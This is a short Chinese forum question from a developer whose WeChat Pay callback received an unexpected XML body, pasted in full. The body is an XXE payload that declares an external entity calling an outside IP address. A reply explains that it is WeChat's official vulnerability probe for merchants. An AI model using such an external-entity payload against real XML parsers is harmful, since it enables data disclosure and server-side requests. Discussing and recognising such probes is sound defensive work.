微信支付回调接口 收到了不识别的XML文件
发布于 5 年前 作者 yuanna 7276 次浏览 来自 问答

<?xml version=“1.0” encoding=“utf-8”?>

<!DOCTYPE root [<!ENTITY xxe SYSTEM 

http://101.91.62.170:4837/wx_xxe_dbc_os_2018092803_79?aHR0cHM6Ly93d3cuamlhbmd4aW5nODg4LmNvbS9odWlTaGVuZ0h1by9hY3Rpb24vV2VpeGluUGF5Q2FsbGJhY2tBY3Rpb24vY2FsbGJhY2s=”>]>

<foo>

<value>&xxe;</value>

</foo>

收到的XML 内容是这样的  自己查了查 好像是  XXE漏洞攻击。。我也不能确认 访问这个地址 也是 404看看是不是官方给了什么东西我们漏掉了

1 回复

你好,这个是微信官方检测商户是否存在安全问题的回调,详细可以查看https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=23_5,如果没有问题,可以忽略此回调。

回到顶部